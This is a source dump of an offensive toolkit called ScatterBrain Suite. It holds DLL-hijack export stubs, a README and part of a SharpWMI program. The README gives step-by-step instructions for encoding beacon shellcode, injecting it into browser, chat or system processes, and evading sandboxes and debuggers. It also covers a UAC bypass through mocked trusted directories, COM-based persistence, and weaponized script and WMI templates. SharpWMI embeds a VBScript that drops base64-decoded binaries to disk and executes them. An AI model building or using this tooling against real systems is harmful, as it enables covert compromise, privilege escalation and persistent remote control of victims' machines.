174 | extern "C" __declspec(dllexport) void waveOutGetDevCapsW();
175 | extern "C" __declspec(dllexport) void waveOutGetErrorTextA();
176 | extern "C" __declspec(dllexport) void waveOutGetErrorTextW();
177 | extern "C" __declspec(dllexport) void waveOutGetID();
178 | extern "C" __declspec(dllexport) void waveOutGetNumDevs();
179 | extern "C" __declspec(dllexport) void waveOutGetPitch();
180 | extern "C" __declspec(dllexport) void waveOutGetPlaybackRate();
181 | extern "C" __declspec(dllexport) void waveOutGetPosition();
182 | extern "C" __declspec(dllexport) void waveOutGetVolume();
183 | extern "C" __declspec(dllexport) void waveOutMessage();
184 | extern "C" __declspec(dllexport) void waveOutOpen();
185 | extern "C" __declspec(dllexport) void waveOutPause();
186 | extern "C" __declspec(dllexport) void waveOutPrepareHeader();
187 | extern "C" __declspec(dllexport) void waveOutReset();
188 | extern "C" __declspec(dllexport) void waveOutRestart();
189 | extern "C" __declspec(dllexport) void waveOutSetPitch();
190 | extern "C" __declspec(dllexport) void waveOutSetPlaybackRate();
191 | extern "C" __declspec(dllexport) void waveOutSetVolume();
192 | extern "C" __declspec(dllexport) void waveOutUnprepareHeader();
193 | extern "C" __declspec(dllexport) void waveOutWrite();
194 | extern "C" __declspec(dllexport) void wid32Message();
195 | extern "C" __declspec(dllexport) void wod32Message();
196 | extern "C" __declspec(dllexport) void DisableSR();
197 | extern "C" __declspec(dllexport) void DisableSRInternal();
198 | extern "C" __declspec(dllexport) void EnableSR();
199 | extern "C" __declspec(dllexport) void EnableSREx();
200 | extern "C" __declspec(dllexport) void EnableSRInternal();
201 | extern "C" __declspec(dllexport) void SRNewSystemId();
202 | extern "C" __declspec(dllexport) void SRRemoveRestorePoint();
203 | extern "C" __declspec(dllexport) void SRSetRestorePointA();
204 | extern "C" __declspec(dllexport) void SRSetRestorePointInternal();
205 | extern "C" __declspec(dllexport) void SRSetRestorePointW();
206 | extern "C" __declspec(dllexport) void SetSRStateAfterSetup();
207 | extern "C" __declspec(dllexport) void SysprepCleanup();
208 | extern "C" __declspec(dllexport) void SysprepGeneralize();
209 |
210 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Author's Note
2 |
3 | This project may or may not be in a broken state. You may have build or compilation issues. This note is just a masquerade for a disclaimer to tell you, dear reader, that I cannot help you should you run into problems. It is up to you to trundle through the Visual Studio error messages and find your way to both compilation and nirvana. If you fail to perservere, may Lord Umbasa have mercy on your soul.
4 |
5 | # ScatterBrain Suite
6 |
7 | ScatterBrain is a shell code runner with a variety of execution and elevation options. Given unencoded shellcode, it will then be encoded with the XOR key `SecretKey` (found in `Cryptor/Program.cs` and `ScatterBrain/Headers/RawData.h`) using the Cryptor binary. Cryptor.exe generates an `encrypted.bin`, which can be copied into `ScatterBrain/Headers/RawData.h`. You can then build ScatterBrain as a DLL which can be leveraged in one of the templates. Additionally, this will build the .NET Profiler UAC Bypass to use in your operations.
8 |
9 | ## Table of Contents
10 | - [Cryptor](#Cryptor)
11 | - [ScatterBrain](#ScatterBrain)
12 | - [CheckPlease Integration](#Check-Please-Integration)
13 | - [UTC Timezone](#UTC-Timezone)
14 | - [USB History](#USB-History)
15 | - [Domain Joined](#Domain-Joined)
16 | - [Username Exists](#Username-Exists)
17 | - [Computername Exists](#Computername-Exists)
18 | - [Sandbox Registry Key Checks](#Sandbox-Registry-Key-Checks)
19 | - [RAM Requirements](#RAM-Requirements)
20 | - [Processor Requirements](#Processor-Requirements)
21 | - [Minimum Number of Processes](#Minimum-Number-Of-Processes)
22 | - [VM Network Adapters](#VM-Network-Adapters)
23 | - [VM Drivers Installed](#VM-Drivers-Installed)
24 | - [Sandbox DLLs](#Sandbox-DLLs)
25 | - [Debugger Attached](#Debugger-Attached)
26 | - [Process Tree Validation](#Process-Tree-Validation)
27 |
28 | - [DWELLS (UAC Bypass)](#DWELLS)
29 | - [Accessibility Features Persistence](#Accessibility-Features-Persistence)
30 | - [Templates](#Templates)
31 | - [Registry Free COM Activation](#Registry-Free-COM-Activation)
32 | - [WMI](#WMI)
33 | - [Video Demo](#Video-Demo)
34 |
35 | ## Requirements
36 | - [HxD Hex Editor](https://mh-nexus.de/en/hxd/)
37 | - Alternatively, a way to programmatically copy the encoded shellcode to a C char array.
38 |
39 | # Cryptor
40 |
41 | ## Description
42 |
43 | Cryptor is a simple .NET binary to encode your shellcode using the hardcoded key `SecretKey` and generates the encrypted shellcode file.
44 |
45 | ## Cryptor Usage
46 | 1. Copy beacon.bin to the same directory as Cryptor.exe.
47 | 2. Run it by: `.\Cryptor.exe beacon.bin`. This will generate the encrypted.bin file.
48 |
49 | # ScatterBrain
50 |
51 | ## Description
52 |
53 | ScatterBrain is a shellcode runner that uses process injection based on the integrity level of the executing process to run its code. Process injection is done via CreateRemoteThread in a suspended state using the file backing of LoadLibraryA, then updating the Thread's context to point to our allocated shellcode and executing. (See: https://blog.xpnsec.com/undersanding-and-evading-get-injectedthread/)
54 |
55 | If executing from a medium integrity process, ScatterBrain will attempt the following search order for binaries:
56 | 1. Default application handler for HTTPS connections.
57 | 2. Brute-force file existence on Chrome, Chrome SxS and FireFox.
58 | 3. Chat applications installed on the machine (such as Slack and Skype).
59 |
60 | If executing from a high integrity context, or if the above fails to resolve any binary, then the application will randomly select one of the following:
61 | - splwow64.exe
62 | - printfilterpipelinesvc.exe
63 | - PrintIsolationHost.exe
64 | - spoolsv.exe
65 | - upnpcont.exe
66 | - conhost.exe
67 | - convertvhd.exe
68 |
69 | It performs mild anti-analysis and signature-based tools by never writing a contiguous memory chunk that is the full, unencoded shell code. Think heap spray but within an allocated memory segment until all available space has been written to.
70 |
71 | The main working function of this file is `MonsterMind` located in `scatterbrain.cpp`. If you wanted to, for example, remove all safety checks, this is where you'd modify that behavior.
72 |
73 | ## A Note on Exported Stubs
74 |
75 | As the project stands, it builds itself using several exported functions that serve as hijack stubs for the DWELLS project. More on it can be found in the [DWELLS](#DWELLS) section.
76 |
77 | ## CheckPlease Integration
78 |
79 | Integrated into this project is CheckPlease, which is capable of doing several anti-sandbox and anti-analysis checks to ensure the payload does not detonate under a false pretense.
80 |
81 | If you wish to change the way "Safe" is defined, you'll need to edit the function `SafeToExecute` in `CheckPlease.cpp`. By default, it checks that:
82 | - Execution occurs within UTC Timezone
83 | - The computer it executes on has a ComputerName
84 | - The process tree from which it is currently executing are signed binaries of Microsoft.
85 |
86 | A full list of options to check for are as follows:
87 |
88 | ### UTC Timezone
89 |
90 | Checks the payload is executing in a valid timezone. Function: `IsUTCTimeZone`
91 |
92 | ### USB History
93 |
94 | Ensures that at least one USB drive has been connected to the machine. Function: `HasUSBHistory`
95 |
96 | ### Domain Joined
97 |
98 | Ensures the computer is joined to a domain, with option to specify the domain in which it should be joined. Function: `IsDomainJoined`
99 |
100 | ### Username Exists
101 |
102 | Ensures the username is retrievable and that the username is not User. Lots of images/sandboxes spin up with this default username. Function: `HasUsername`
103 |
104 | ### ComputerName Exists
105 |
106 | Ensures the environment has a retrievable and ComputerName. Function: `HasComputerName`
107 |
108 | ### Sandbox Registry Key checks
109 |
110 | This checks several different registry keys to see if the environment is a VMWare or Oracle virtual box. Function: `HasSandboxRegistryKeys`
111 |
112 | ### Ram Requirements
113 |
114 | Check to see if the current executing environment has at least 4 gbs of RAM installed. Function: `HasMinRAM`
115 |
116 | ### Processor Requirements
117 |
118 | Ensures the computer has a minimum number of processor cores before executing. Minimum: 2. Function: `HasNumberOfProcessors`
119 |
120 | ### Minimum Number of Processes
121 |
122 | Ensures that the computer being detonated on has at least 50 processes running. Could up this to 75 potentially. Function: `HasMinNumProcesses`
123 |
124 | ### Bad Processes Running
125 |
126 | Enumerate the current processes running and cross check them against a list of bad processes known to be run in malware analysis toolkits or VMs. Function: `BadProcessesRunning`
127 |
128 | ### VM Network Adapters
129 |
130 | This checks to see if the computer has any VM network adapters associated to it by cross-referencing its MAC address. Function: `HasVMMacAddress`
131 |
132 | ### VM Drivers Installed
133 |
134 | Check for the presence of drivers on disk that indicate this is a virtual machine. Function: `VMDriversPresent`
135 |
136 | ### Sandbox DLLs
137 |
138 | Checks for DLLs on disk that indicate the the executing process is running under a VM. Function: `HasSandboxDLLs`
139 |
140 | ### Debugger Attached
141 |
142 | Checks to see if a remote debugger has been attached to the executing process. This is done via the API call and not the IsDebugged flag, which is always set to true in newer versions of Windows.
143 |
144 | ### Process Tree Validation
145 |
146 | Check the current process tree to see if the payload is detonating in a suspicious manner. Namely, if any parent process of the executable has an unsigned parent, or a parent whose signature does not match Microsoft Windows Production, this will return FALSE. Function: `HasBadParentProcess`
147 |
148 | ## ScatterBrain Usage
149 |
150 | 1. Ensure that in the Project Properties you're building as a DLL. (Note: This is important if you want the UAC bypass binary built simultaneously, otherwise it will fail.)
151 |
152 | 2. Open encrypted.bin in HxD (https://mh-nexus.de/en/hxd/)
153 |
154 | 
155 |
156 | 3. Ctrl+A and click Edit -> Copy As -> C
157 |
158 | 
159 |
160 | 4. Open `RawData.h` in the ScatterBrain project and paste like so (note: From HxD, this is automatically formatted):
161 |
162 | 
163 |
164 | 5. Build Release x64 of ScatterBrain. Upon build completion the DLL will be copied to the DNH project's Resources directory.
165 |
166 | ## Example Runtime
167 | 
168 |
169 | # DWELLS
170 |
171 | ## Description
172 |
173 | DWELLS is a UAC Bypass that gains privileged code execution by creating mock Windows directories. The technique write-up can be found at this article here: https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e
174 |
175 | ## Usage
176 |
177 | 1. Ensure ScatterBrain is set to build as a DLL.
178 | 2. Build the DWELLS project.
179 | 3. Execute the binary with no arguments to execute the shell code in high integrity.
180 |
181 | ## Usage Notes
182 |
183 | The high-integrity becaon will spawn without the usual administrative privileges. To regain your expected privs, just run `getpriv` from the new beacon.
184 |
185 | Further, if you wanted to create a `shinject`-able version of the DLL, you'd need to remove the embedded resource and instead create a char array of the ScatterBrain.dll and write the file accordingly. For the sake of automation, the executable route was taken. If you do persue the `shinject` route, use Nick Lander'sRDI project to convert the DWELLS.dll into shellcode. (https://github.com/monoxgas/sRDI/blob/master/PowerShell/ConvertTo-Shellcode.ps1).
186 |
187 | # Accessibility Features Persistence
188 |
189 | ## Description
190 |
191 | Accessibility Features Persistence stems from the Vault 7 leak that utilizes registering a new COM object in `HKCU:\Software\Classes\CLSID\`. Once registered it will drop the payload to disk in one of several different locations within APPDATA, followed by creating a new junction folder based on the drop location. The payload will execute when:
192 |
193 | 1. Upon first installation of the payload.
194 | 2. When the system has restarted.
195 | 3. More than one day has passed.
196 |
197 | **Important note:** You **must** note the GUID generated from the installation for the implant to be properly removed. Otherwise you'll need to hunt down the GUID in the registry which can be a nightmare.
198 |
199 | ## Usage
200 |
201 | ```
202 | Usage:
203 | Arguments:
204 | install - Installs the agent.
205 | uninstall {CLSID} - Uninstalls the given CLSID.
206 |
207 | Examples:
208 | .\AccessibilityFeaturesPersistence.exe install
209 | .\AccessibilityFeaturesPersistence.exe uninstall "{a3df199e-bc97-4c87-ada6-4b5287a0d9e5}"
210 | ```
211 |
212 | ## References
213 |
214 | https://vanmieghem.io/persisting-like-a-cia-agent/
215 |
216 | # Templates
217 |
218 | I've included a handful of templates that are simple enough to plug and play. The only change that needs to be made to each template is to base64 encode the ScatterBrain.dll and insert it into the templates.
219 |
220 | ## Registry Free COM Activation
221 |
222 | Registry-free COM activation is an excellent way to export this DLL into a variety of formats, be it JScript, VBScript, VBApplications, WMI event consumers and more. To do so I've built templates for both jscript and vbscript that only require the user to replace the DLL bytes where the templates say `B64_DLL_BYTES_GO_HERE`. To do so (from powershell), issue a `[System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("$PWD\x64\Release\ScatterBrain.dll")) | clip`. Then paste the base64 string into one of the templates (note the trailing new line if you used `clip`-- you'll want to delete that to be syntactically correct). Now you have a working payload that should work in VBScript or JScript!
223 |
224 | ## WMI
225 |
226 | Once you have weaponized the corresponding JScript or VBScript templates from above, paste the code into the corresponding `regfree_com_activation_templates/wmi.ps1` file or SharpWMI's `Program.cs` and rebuild SharpWMI. You'll be all set to pivot using the DLL.
227 |
228 | # Video Demo
229 |
230 | ## Demo of setting up your first payload:
231 | [](https://drive.google.com/open?id=1SoHH9rNDb4I-ohelkw4NxYHo1RGriHBQ)
232 |
233 | ## Demo of default safety checks
234 | [](https://drive.google.com/open?id=1-cGYueV9VtNRbAIPQaNayU19zjwwsjeC)
235 |
--------------------------------------------------------------------------------
/ScatterBrain/HijackStubs.cpp:
--------------------------------------------------------------------------------
1 | #include "stdafx.h"
2 |
3 | extern "C" __declspec(dllexport) void CloseDriver()
4 | {}
5 | extern "C" __declspec(dllexport) void DefDriverProc()
6 | {}
7 | extern "C" __declspec(dllexport) void DriverCallback()
8 | {}
9 | extern "C" __declspec(dllexport) void DrvGetModuleHandle()
10 | {}
11 | extern "C" __declspec(dllexport) void GetDriverModuleHandle()
12 | {}
13 | extern "C" __declspec(dllexport) void NotifyCallbackData()
14 | {}
15 | extern "C" __declspec(dllexport) void OpenDriver()
16 | {}
17 | extern "C" __declspec(dllexport) void PlaySound()
18 | {}
19 | extern "C" __declspec(dllexport) void PlaySoundA()
20 | {}
21 | extern "C" __declspec(dllexport) void PlaySoundW()
22 | {}
23 | extern "C" __declspec(dllexport) void SendDriverMessage()
24 | {}
25 | extern "C" __declspec(dllexport) void WOW32DriverCallback()
26 | {}
27 | extern "C" __declspec(dllexport) void WOW32ResolveMultiMediaHandle()
28 | {}
29 | extern "C" __declspec(dllexport) void WOWAppExit()
30 | {}
31 | extern "C" __declspec(dllexport) void aux32Message()
32 | {}
33 | extern "C" __declspec(dllexport) void auxGetDevCapsA()
34 | {}
35 | extern "C" __declspec(dllexport) void auxGetDevCapsW()
36 | {}
37 | extern "C" __declspec(dllexport) void auxGetNumDevs()
38 | {}
39 | extern "C" __declspec(dllexport) void auxGetVolume()
40 | {}
41 | extern "C" __declspec(dllexport) void auxOutMessage()
42 | {}
43 | extern "C" __declspec(dllexport) void auxSetVolume()
44 | {}
45 | extern "C" __declspec(dllexport) void joy32Message()
46 | {}
47 | extern "C" __declspec(dllexport) void joyConfigChanged()
48 | {}
49 | extern "C" __declspec(dllexport) void joyGetDevCapsA()
50 | {}
51 | extern "C" __declspec(dllexport) void joyGetDevCapsW()
52 | {}
53 | extern "C" __declspec(dllexport) void joyGetNumDevs()
54 | {}
55 | extern "C" __declspec(dllexport) void joyGetPos()
56 | {}
57 | extern "C" __declspec(dllexport) void joyGetPosEx()
58 | {}
59 | extern "C" __declspec(dllexport) void joyGetThreshold()
60 | {}
61 | extern "C" __declspec(dllexport) void joyReleaseCapture()
62 | {}
63 | extern "C" __declspec(dllexport) void joySetCapture()
64 | {}
65 | extern "C" __declspec(dllexport) void joySetThreshold()
66 | {}
67 | extern "C" __declspec(dllexport) void mci32Message()
68 | {}
69 | extern "C" __declspec(dllexport) void mciDriverNotify()
70 | {}
71 | extern "C" __declspec(dllexport) void mciDriverYield()
72 | {}
73 | extern "C" __declspec(dllexport) void mciExecute()
74 | {}
75 | extern "C" __declspec(dllexport) void mciFreeCommandResource()
76 | {}
77 | extern "C" __declspec(dllexport) void mciGetCreatorTask()
78 | {}
79 | extern "C" __declspec(dllexport) void mciGetDeviceIDA()
80 | {}
81 | extern "C" __declspec(dllexport) void mciGetDeviceIDFromElementIDA()
82 | {}
83 | extern "C" __declspec(dllexport) void mciGetDeviceIDFromElementIDW()
84 | {}
85 | extern "C" __declspec(dllexport) void mciGetDeviceIDW()
86 | {}
87 | extern "C" __declspec(dllexport) void mciGetDriverData()
88 | {}
89 | extern "C" __declspec(dllexport) void mciGetErrorStringA()
90 | {}
91 | extern "C" __declspec(dllexport) void mciGetErrorStringW()
92 | {}
93 | extern "C" __declspec(dllexport) void mciGetYieldProc()
94 | {}
95 | extern "C" __declspec(dllexport) void mciLoadCommandResource()
96 | {}
97 | extern "C" __declspec(dllexport) void mciSendCommandA()
98 | {}
99 | extern "C" __declspec(dllexport) void mciSendCommandW()
100 | {}
101 | extern "C" __declspec(dllexport) void mciSendStringA()
102 | {}
103 | extern "C" __declspec(dllexport) void mciSendStringW()
104 | {}
105 | extern "C" __declspec(dllexport) void mciSetDriverData()
106 | {}
107 | extern "C" __declspec(dllexport) void mciSetYieldProc()
108 | {}
109 | extern "C" __declspec(dllexport) void mid32Message()
110 | {}
111 | extern "C" __declspec(dllexport) void midiConnect()
112 | {}
113 | extern "C" __declspec(dllexport) void midiDisconnect()
114 | {}
115 | extern "C" __declspec(dllexport) void midiInAddBuffer()
116 | {}
117 | extern "C" __declspec(dllexport) void midiInClose()
118 | {}
119 | extern "C" __declspec(dllexport) void midiInGetDevCapsA()
120 | {}
121 | extern "C" __declspec(dllexport) void midiInGetDevCapsW()
122 | {}
123 | extern "C" __declspec(dllexport) void midiInGetErrorTextA()
124 | {}
125 | extern "C" __declspec(dllexport) void midiInGetErrorTextW()
126 | {}
127 | extern "C" __declspec(dllexport) void midiInGetID()
128 | {}
129 | extern "C" __declspec(dllexport) void midiInGetNumDevs()
130 | {}
131 | extern "C" __declspec(dllexport) void midiInMessage()
132 | {}
133 | extern "C" __declspec(dllexport) void midiInOpen()
134 | {}
135 | extern "C" __declspec(dllexport) void midiInPrepareHeader()
136 | {}
137 | extern "C" __declspec(dllexport) void midiInReset()
138 | {}
139 | extern "C" __declspec(dllexport) void midiInStart()
140 | {}
141 | extern "C" __declspec(dllexport) void midiInStop()
142 | {}
143 | extern "C" __declspec(dllexport) void midiInUnprepareHeader()
144 | {}
145 | extern "C" __declspec(dllexport) void midiOutCacheDrumPatches()
146 | {}
147 | extern "C" __declspec(dllexport) void midiOutCachePatches()
148 | {}
149 | extern "C" __declspec(dllexport) void midiOutClose()
150 | {}
151 | extern "C" __declspec(dllexport) void midiOutGetDevCapsA()
152 | {}
153 | extern "C" __declspec(dllexport) void midiOutGetDevCapsW()
154 | {}
155 | extern "C" __declspec(dllexport) void midiOutGetErrorTextA()
156 | {}
157 | extern "C" __declspec(dllexport) void midiOutGetErrorTextW()
158 | {}
159 | extern "C" __declspec(dllexport) void midiOutGetID()
160 | {}
161 | extern "C" __declspec(dllexport) void midiOutGetNumDevs()
162 | {}
163 | extern "C" __declspec(dllexport) void midiOutGetVolume()
164 | {}
165 | extern "C" __declspec(dllexport) void midiOutLongMsg()
166 | {}
167 | extern "C" __declspec(dllexport) void midiOutMessage()
168 | {}
169 | extern "C" __declspec(dllexport) void midiOutOpen()
170 | {}
171 | extern "C" __declspec(dllexport) void midiOutPrepareHeader()
172 | {}
173 | extern "C" __declspec(dllexport) void midiOutReset()
174 | {}
175 | extern "C" __declspec(dllexport) void midiOutSetVolume()
176 | {}
177 | extern "C" __declspec(dllexport) void midiOutShortMsg()
178 | {}
179 | extern "C" __declspec(dllexport) void midiOutUnprepareHeader()
180 | {}
181 | extern "C" __declspec(dllexport) void midiStreamClose()
182 | {}
183 | extern "C" __declspec(dllexport) void midiStreamOpen()
184 | {}
185 | extern "C" __declspec(dllexport) void midiStreamOut()
186 | {}
187 | extern "C" __declspec(dllexport) void midiStreamPause()
188 | {}
189 | extern "C" __declspec(dllexport) void midiStreamPosition()
190 | {}
191 | extern "C" __declspec(dllexport) void midiStreamProperty()
192 | {}
193 | extern "C" __declspec(dllexport) void midiStreamRestart()
194 | {}
195 | extern "C" __declspec(dllexport) void midiStreamStop()
196 | {}
197 | extern "C" __declspec(dllexport) void mixerClose()
198 | {}
199 | extern "C" __declspec(dllexport) void mixerGetControlDetailsA()
200 | {}
201 | extern "C" __declspec(dllexport) void mixerGetControlDetailsW()
202 | {}
203 | extern "C" __declspec(dllexport) void mixerGetDevCapsA()
204 | {}
205 | extern "C" __declspec(dllexport) void mixerGetDevCapsW()
206 | {}
207 | extern "C" __declspec(dllexport) void mixerGetID()
208 | {}
209 | extern "C" __declspec(dllexport) void mixerGetLineControlsA()
210 | {}
211 | extern "C" __declspec(dllexport) void mixerGetLineControlsW()
212 | {}
213 | extern "C" __declspec(dllexport) void mixerGetLineInfoA()
214 | {}
215 | extern "C" __declspec(dllexport) void mixerGetLineInfoW()
216 | {}
217 | extern "C" __declspec(dllexport) void mixerGetNumDevs()
218 | {}
219 | extern "C" __declspec(dllexport) void mixerMessage()
220 | {}
221 | extern "C" __declspec(dllexport) void mixerOpen()
222 | {}
223 | extern "C" __declspec(dllexport) void mixerSetControlDetails()
224 | {}
225 | extern "C" __declspec(dllexport) void mmDrvInstall()
226 | {}
227 | extern "C" __declspec(dllexport) void mmGetCurrentTask()
228 | {}
229 | extern "C" __declspec(dllexport) void mmTaskBlock()
230 | {}
231 | extern "C" __declspec(dllexport) void mmTaskCreate()
232 | {}
233 | extern "C" __declspec(dllexport) void mmTaskSignal()
234 | {}
235 | extern "C" __declspec(dllexport) void mmTaskYield()
236 | {}
237 | extern "C" __declspec(dllexport) void mmioAdvance()
238 | {}
239 | extern "C" __declspec(dllexport) void mmioAscend()
240 | {}
241 | extern "C" __declspec(dllexport) void mmioClose()
242 | {}
243 | extern "C" __declspec(dllexport) void mmioCreateChunk()
244 | {}
245 | extern "C" __declspec(dllexport) void mmioDescend()
246 | {}
247 | extern "C" __declspec(dllexport) void mmioFlush()
248 | {}
249 | extern "C" __declspec(dllexport) void mmioGetInfo()
250 | {}
251 | extern "C" __declspec(dllexport) void mmioInstallIOProcA()
252 | {}
253 | extern "C" __declspec(dllexport) void mmioInstallIOProcW()
254 | {}
255 | extern "C" __declspec(dllexport) void mmioOpenA()
256 | {}
257 | extern "C" __declspec(dllexport) void mmioOpenW()
258 | {}
259 | extern "C" __declspec(dllexport) void mmioRead()
260 | {}
261 | extern "C" __declspec(dllexport) void mmioRenameA()
262 | {}
263 | extern "C" __declspec(dllexport) void mmioRenameW()
264 | {}
265 | extern "C" __declspec(dllexport) void mmioSeek()
266 | {}
267 | extern "C" __declspec(dllexport) void mmioSendMessage()
268 | {}
269 | extern "C" __declspec(dllexport) void mmioSetBuffer()
270 | {}
271 | extern "C" __declspec(dllexport) void mmioSetInfo()
272 | {}
273 | extern "C" __declspec(dllexport) void mmioStringToFOURCCA()
274 | {}
275 | extern "C" __declspec(dllexport) void mmioStringToFOURCCW()
276 | {}
277 | extern "C" __declspec(dllexport) void mmioWrite()
278 | {}
279 | extern "C" __declspec(dllexport) void mmsystemGetVersion()
280 | {}
281 | extern "C" __declspec(dllexport) void mod32Message()
282 | {}
283 | extern "C" __declspec(dllexport) void mxd32Message()
284 | {}
285 | extern "C" __declspec(dllexport) void sndPlaySoundA()
286 | {}
287 | extern "C" __declspec(dllexport) void sndPlaySoundW()
288 | {}
289 | extern "C" __declspec(dllexport) void tid32Message()
290 | {}
291 | extern "C" __declspec(dllexport) void timeBeginPeriod()
292 | {}
293 | extern "C" __declspec(dllexport) void timeEndPeriod()
294 | {}
295 | extern "C" __declspec(dllexport) void timeGetDevCaps()
296 | {}
297 | extern "C" __declspec(dllexport) void timeGetSystemTime()
298 | {}
299 | extern "C" __declspec(dllexport) void timeGetTime()
300 | {}
301 | extern "C" __declspec(dllexport) void timeKillEvent()
302 | {}
303 | extern "C" __declspec(dllexport) void timeSetEvent()
304 | {}
305 | extern "C" __declspec(dllexport) void waveInAddBuffer()
306 | {}
307 | extern "C" __declspec(dllexport) void waveInClose()
308 | {}
309 | extern "C" __declspec(dllexport) void waveInGetDevCapsA()
310 | {}
311 | extern "C" __declspec(dllexport) void waveInGetDevCapsW()
312 | {}
313 | extern "C" __declspec(dllexport) void waveInGetErrorTextA()
314 | {}
315 | extern "C" __declspec(dllexport) void waveInGetErrorTextW()
316 | {}
317 | extern "C" __declspec(dllexport) void waveInGetID()
318 | {}
319 | extern "C" __declspec(dllexport) void waveInGetNumDevs()
320 | {}
321 | extern "C" __declspec(dllexport) void waveInGetPosition()
322 | {}
323 | extern "C" __declspec(dllexport) void waveInMessage()
324 | {}
325 | extern "C" __declspec(dllexport) void waveInOpen()
326 | {}
327 | extern "C" __declspec(dllexport) void waveInPrepareHeader()
328 | {}
329 | extern "C" __declspec(dllexport) void waveInReset()
330 | {}
331 | extern "C" __declspec(dllexport) void waveInStart()
332 | {}
333 | extern "C" __declspec(dllexport) void waveInStop()
334 | {}
335 | extern "C" __declspec(dllexport) void waveInUnprepareHeader()
336 | {}
337 | extern "C" __declspec(dllexport) void waveOutBreakLoop()
338 | {}
339 | extern "C" __declspec(dllexport) void waveOutClose()
340 | {}
341 | extern "C" __declspec(dllexport) void waveOutGetDevCapsA()
342 | {}
343 | extern "C" __declspec(dllexport) void waveOutGetDevCapsW()
344 | {}
345 | extern "C" __declspec(dllexport) void waveOutGetErrorTextA()
346 | {}
347 | extern "C" __declspec(dllexport) void waveOutGetErrorTextW()
348 | {}
349 | extern "C" __declspec(dllexport) void waveOutGetID()
350 | {}
351 | extern "C" __declspec(dllexport) void waveOutGetNumDevs()
352 | {}
353 | extern "C" __declspec(dllexport) void waveOutGetPitch()
354 | {}
355 | extern "C" __declspec(dllexport) void waveOutGetPlaybackRate()
356 | {}
357 | extern "C" __declspec(dllexport) void waveOutGetPosition()
358 | {}
359 | extern "C" __declspec(dllexport) void waveOutGetVolume()
360 | {}
361 | extern "C" __declspec(dllexport) void waveOutMessage()
362 | {}
363 | extern "C" __declspec(dllexport) void waveOutOpen()
364 | {}
365 | extern "C" __declspec(dllexport) void waveOutPause()
366 | {}
367 | extern "C" __declspec(dllexport) void waveOutPrepareHeader()
368 | {}
369 | extern "C" __declspec(dllexport) void waveOutReset()
370 | {}
371 | extern "C" __declspec(dllexport) void waveOutRestart()
372 | {}
373 | extern "C" __declspec(dllexport) void waveOutSetPitch()
374 | {}
375 | extern "C" __declspec(dllexport) void waveOutSetPlaybackRate()
376 | {}
377 | extern "C" __declspec(dllexport) void waveOutSetVolume()
378 | {}
379 | extern "C" __declspec(dllexport) void waveOutUnprepareHeader()
380 | {}
381 | extern "C" __declspec(dllexport) void waveOutWrite()
382 | {}
383 | extern "C" __declspec(dllexport) void wid32Message()
384 | {}
385 | extern "C" __declspec(dllexport) void wod32Message()
386 | {}
387 | extern "C" __declspec(dllexport) void DisableSR()
388 | {}
389 | extern "C" __declspec(dllexport) void DisableSRInternal()
390 | {}
391 | extern "C" __declspec(dllexport) void EnableSR()
392 | {}
393 | extern "C" __declspec(dllexport) void EnableSREx()
394 | {}
395 | extern "C" __declspec(dllexport) void EnableSRInternal()
396 | {}
397 | extern "C" __declspec(dllexport) void SRNewSystemId()
398 | {}
399 | extern "C" __declspec(dllexport) void SRRemoveRestorePoint()
400 | {}
401 | extern "C" __declspec(dllexport) void SRSetRestorePointA()
402 | {}
403 | extern "C" __declspec(dllexport) void SRSetRestorePointInternal()
404 | {}
405 | extern "C" __declspec(dllexport) void SRSetRestorePointW()
406 | {}
407 | extern "C" __declspec(dllexport) void SetSRStateAfterSetup()
408 | {}
409 | extern "C" __declspec(dllexport) void SysprepCleanup()
410 | {}
411 | extern "C" __declspec(dllexport) void SysprepGeneralize()
412 | {}
--------------------------------------------------------------------------------
/SharpWMI/SharpWMI/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Management;
4 |
5 | namespace SharpWMI
6 | {
7 | class Program
8 | {
9 | // replace the VBS below with whatever logic you want to execute for action=executevbs
10 | public static string vbsPayload = @"
11 | Function decodeBase64(base64)
12 | dim DM, EL
13 | Set DM = CreateObject(""Microsoft.XMLDOM"")
14 | ' Create temporary node with Base64 data type
15 | Set EL = DM.createElement(""tmp"")
16 |
17 | EL.DataType = ""bin.base64""
18 | ' Set encoded String, get bytes
19 | EL.Text = base64
20 | decodeBase64 = EL.NodeTypedValue
21 | End Function
22 |
23 | Sub writeBytes(file, bytes)
24 |
25 | Dim binaryStream
26 |
27 | Const TypeBinary = 1
28 |
29 | Const ForReading = 1, ForWriting = 2, ForAppending = 8
30 |
31 | Set binaryStream = CreateObject(""ADODB.Stream"")
32 |
33 | binaryStream.Type = TypeBinary
34 | 'Open the stream and write binary data
35 | binaryStream.Open
36 | binaryStream.Write bytes
37 | 'Save binary data to disk
38 |
39 | binaryStream.SaveToFile file, ForWriting
40 | End Sub
41 |
42 |
43 | fileName = ""{0}""
44 | classObj = ""{1}""
45 | manifest = """"
46 | Set SFSO = CreateObject(""Scripting.FileSystemObject"")
47 | dropPath = SFSO.GetSpecialFolder(2)
48 | dynwrapX = ""{2}""
49 |
50 |
51 | dynwrapXBytes = decodeBase64(dynwrapX)
52 | finalPath = dropPath + ""\"" + fileName
53 | writeBytes finalPath, dynwrapXBytes
54 |
55 |
56 | Set ax = CreateObject(""Microsoft.Windows.ActCtx"")
57 | ax.ManifestText = manifest
58 |
59 | Set DWX = ax.CreateObject(classObj)
60 |
61 | ";
62 | public static string RandomString(int length)
63 | {
64 | var chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
65 | var stringChars = new char[length];
66 | var random = new Random();
67 |
68 | for (int i = 0; i < stringChars.Length; i++)
69 | {
70 | stringChars[i] = chars[random.Next(0, chars.Length - 1)];
71 | }
72 |
73 | var finalString = new String(stringChars);
74 | return finalString;
75 | }
76 |
77 | static void Usage()
78 | {
79 | Console.WriteLine("\r\n SharpWMI\r\n");
80 | Console.WriteLine(" Local system enumeration :\r\n SharpWMI.exe action=query query=\"select * from win32_service\" [namespace=BLAH]");
81 | Console.WriteLine(" Remote system enumeration :\r\n SharpWMI.exe action=query computername=HOST1[,HOST2,...] query=\"select * from win32_service\" [namespace=BLAH]");
82 | Console.WriteLine(" Remote process creation :\r\n SharpWMI.exe action=create computername=HOST[,HOST2,...] command=\"C:\\temp\\process.exe [args]\"");
